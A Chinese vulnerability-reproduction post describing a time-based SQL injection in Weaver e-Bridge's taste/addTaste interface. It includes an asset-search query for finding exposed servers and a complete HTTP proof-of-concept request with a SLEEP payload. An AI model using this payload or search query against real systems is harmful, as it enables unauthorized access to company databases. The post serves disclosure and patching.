漏洞复现|泛微-云桥e-Bridge SQL注入漏洞

admin 2023年12月15日17:55:32评论95 views字数 1233阅读4分6秒阅读模式
文章声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。本文所提供的工具仅用于学习,禁止用于其他目的,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
产品介绍

漏洞复现|泛微-云桥e-Bridge SQL注入漏洞

泛微云桥(e-Bridge)是一款用于桥接各种以IM为核心的移动APP与企业信息化系统移动H5应用的系统集成平台,主要实现用户认证,单点登录以及消息推送,目前云桥已经支持与企业微信、微信公众号、钉钉(包括阿里钉钉和政务钉钉)、云之家、飞书、welink以及微信小程序集成,如需要与上述以外的app集成,可通过其他APP方式来集成。后续e-bridge将整合更多的互联网信息化资源,让企业能够更加便利的利用开放的互联网资源进行企业信息化建设。

漏洞介绍
泛微云桥e-Bridge体验账号程序接口taste/addTaste处存在sql注入漏洞,导致攻击者可以获取数据库中敏感数据

漏洞编号:无

漏洞类:SQL注入(延迟注入)

资产测绘

漏洞复现|泛微-云桥e-Bridge SQL注入漏洞

360QUAKE=app:"泛微-云桥e-Bridge"

漏洞复现

访问http://目标IP+端口/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1出现如下界面可能存在漏洞。
漏洞复现|泛微-云桥e-Bridge SQL注入漏洞
使用Burp进行抓包,使用测试是否存在漏洞点,如存在漏洞页面延迟10s,POC如下:GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(10-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1Host: 目标IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
漏洞复现|泛微-云桥e-Bridge SQL注入漏洞
注:url需要进行编码

修复建议

官方已修复此漏洞,建议受影响用户尽快在官网查询更新

原文始发于微信公众号(Guoxin 401):漏洞复现|泛微-云桥e-Bridge SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日17:55:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现|泛微-云桥e-Bridge SQL注入漏洞https://cn-sec.com/archives/2303080.html

发表评论

匿名网友 填写信息